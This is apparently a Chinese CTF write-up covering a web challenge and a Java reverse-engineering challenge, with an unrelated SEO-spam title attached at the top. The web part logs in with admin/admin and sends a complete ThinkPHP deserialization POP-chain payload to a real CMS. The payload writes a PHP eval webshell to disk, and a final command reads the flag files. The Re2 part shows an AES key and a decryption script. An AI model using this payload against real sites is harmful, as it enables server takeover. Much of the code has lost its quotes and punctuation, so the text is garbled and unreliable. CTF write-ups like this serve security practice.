怎么免费自己做网站,做网站开发的有哪些公司好,品牌vi设计公司企业,如何做网站淘客推广这两道题属于比较简单的#xff0c;顺道说一下#xff0c;今年的题有点抽象#xff0c;web不是misc#xff0c;re不是web的#xff0c;也有可能时代在进步#xff0c;现在要求全栈✌了吧
web1
最开始被强网的小浣熊带偏思路了#xff0c;进来疯狂找sql注入#xff0c…这两道题属于比较简单的顺道说一下今年的题有点抽象web不是miscre不是web的也有可能时代在进步现在要求全栈✌了吧
web1
最开始被强网的小浣熊带偏思路了进来疯狂找sql注入结果后台弱口令一试 admin/admin
找了一堆POC都打不通进到后台试了半天文件上传也不行最后只能针对cms版本进行攻击找到了
https://cn-sec.com/archives/2640154.html文章照着文章里的方法打就好了
进左侧最下面的功能地图把栏目字段启用 POST /login.php?madmincFieldaarctype_add_ajax1langcn
titlepoc3namepoc3dtyperegiondfvalue1remarktypeids%5B%5D0channel_id-99
之后会新建一个poc3的字段要记住这个字段的ID 然后打POC
POST /login.php?madmincFieldaarctype_edit_ajax1langcn
titlepoc3namepoc3old_dtyperegiondfvalueO%3A27%3A%22think%5Cprocess%5Cpipes%5CWindows%22%3A1%3A%7Bs%3A5%3A%22files%22%3Ba%3A1%3A%7Bi%3A0%3BO%3A17%3A%22think%5Cmodel%5CPivot%22%3A2%3A%7Bs%3A6%3A%22append%22%3Ba%3A1%3A%7Bi%3A0%3Bs%3A8%3A%22getError%22%3B%7Ds%3A5%3A%22error%22%3BO%3A27%3A%22think%5Cmodel%5Crelation%5CHasOne%22%3A1%3A%7Bs%3A5%3A%22query%22%3BO%3A20%3A%22think%5Cconsole%5COutput%22%3A2%3A%7Bs%3A6%3A%22styles%22%3Ba%3A1%3A%7Bi%3A0%3Bs%3A16%3A%22removeWhereField%22%3B%7Ds%3A6%3A%22handle%22%3BO%3A30%3A%22think%5Csession%5Cdriver%5CMemcached%22%3A1%3A%7Bs%3A7%3A%22handler%22%3BO%3A23%3A%22think%5Ccache%5Cdriver%5CFile%22%3A2%3A%7Bs%3A3%3A%22tag%22%3Bs%3A1%3A%22t%22%3Bs%3A7%3A%22options%22%3Ba%3A1%3A%7Bs%3A4%3A%22path%22%3Bs%3A68%3A%22php%3A%2F%2Ffilter%2Fstring.rot13%2Fresource%3D%3C%3Fcuc%40riny%28%24_TRG%5B_%5D%29%3B%3F%3E%2F..%2Fa.php%22%3B%7D%7D%7D%7D%7D%7D%7D%7Dold_dfvalue1remarktypeids%5B%5D0channel_id-99id545old_namepoc3dtype[]region 完事之后访问/login.php?madmincFieldachannel_editchannel_id-99id545_ajax1路径返回500
之后就getshell了
/a.php617ac73525b333bea4ac35a717dd8b0a.php?_system(cat /f*); Re2 拖到jar反编译工具里发现该处存在密钥和加密方法提示(AES): 接下来就是找密文最开始找错了
找到这结果出来一堆java的类名翻了下下面的类找到了这块
正则提取密文
import re# 读取文件内容with open(pwd.txt, r, encodingutf-8) as file:content file.read()# 使用正则表达式提取所有括号内的内容matches re.findall(r\(([^])\), content)# 打印或保存结果for match in matches:print(match)with open(extracted_content.txt, w, encodingutf-8) as output_file:for match in matches:output_file.write(match \n\n)
直接GPT 直接跑 from Crypto.Cipher import AES
from Crypto.Util.Padding import unpad
import base64# 密钥key bY4SuperSecretKey# 新密文列表ciphertexts [lD0pdU19mlA1xzNMZScMow,vHTdmhywhmrERttY0v8WPA,wOd4I7sVhw5HkgZMqTQlaA,yV6xw9tYxleD0h9egW2/XNXXL1pHUnuP3m8ii1TeCMSJTegZd2igKplap480ZRD/zkyXFtgSjExqvp5RTM5rjfOaEyoSArhtwuiS5U,edT1iLMQCSvyHMUjip/M/A,vHTdmhywhmrERttY0v8WPA,wOd4I7sVhw5HkgZMqTQlaA,xkXC55umWZBHWtLx1dCCw,uX4UoCpC1vhwr9Qjgpu31uIMLuC9MMTFZdoHUgTrXfo,vHTdmhywhmrERttY0v8WPA,BLYz3Sg6p3/X/BPYNW1L7FPYr0DwjapP8ge2BnUIVgk,uX4UoCpC1vhwr9Qjgpu31uIMLuC9MMTFZdoHUgTrXfo,3EqYg7luQqWh5PuOtpGw4LUslS/TdDl5fRE1R6o557EUbcQFc0Ub6IFcpGpp/xh7,yV6xw9tYxleD0h9egW2/XSxK49PPZReLv9k58hqjT8,1sth17wAFRt4wAGPDITmg,yV6xw9tYxleD0h9egW2/XnNOjAgvjLs2pu7dXzqrI,Anj05GN/w2zBXhTp7riKrGXt8cugU0ZLiec1Gsd1JsPe9kdfQpqBwV8tlru4DIUbg2ym6/BKkXTIkIAsDbA9g,nG1R4Vi6NnBcBZ/yoHLWrQ,aa5CJ5IF6MOG2H2e1Wdhg,KYLTetODpmvJ6F1dm/8ghQ,KYLTetODpmvJ6F1dm/8ghQ,vNXU4qrC9TvFzpRv4tbSsJW9UbGnputRSzGdevVAiG0wps8qiqPXXoCmmnIex25,KYLTetODpmvJ6F1dm/8ghQ,vNXU4qrC9TvFzpRv4tbSsJW9UbGnputRSzGdevVAiG0wps8qiqPXXoCmmnIex25,LUj6lY0pyGsgf7h8uGlrUTP24ysker1No7mzBIAUHjcwsEmlkBNavkjjdNx7605ybDccQ/I5izOOjOSSYUbIMA,uX4UoCpC1vhwr9Qjgpu31uIMLuC9MMTFZdoHUgTrXfo,FHbZr6qgY3p8S52uoSwUrzLJu/BapSVDBVcsY//3k,hllzo1U5TtIPfKWnxzEkWKPnX8SgrjiSIMuSly1LX78,3EqYg7luQqWh5PuOtpGw4LUslS/TdDl5fRE1R6o557EUbcQFc0Ub6IFcpGpp/xh7,gvewj5POa93RqmusJXQ4A,YwDUGijDV5zY3M45IJyypg
]# 创建AES解密器cipher AES.new(key, AES.MODE_ECB)# 解密所有密文for ct in ciphertexts:ciphertext base64.b64decode(ct)try:decrypted unpad(cipher.decrypt(ciphertext), AES.block_size)print(decrypted.decode(utf-8))except Exception as e:print(f解密失败: {ct}, 错误: {e})
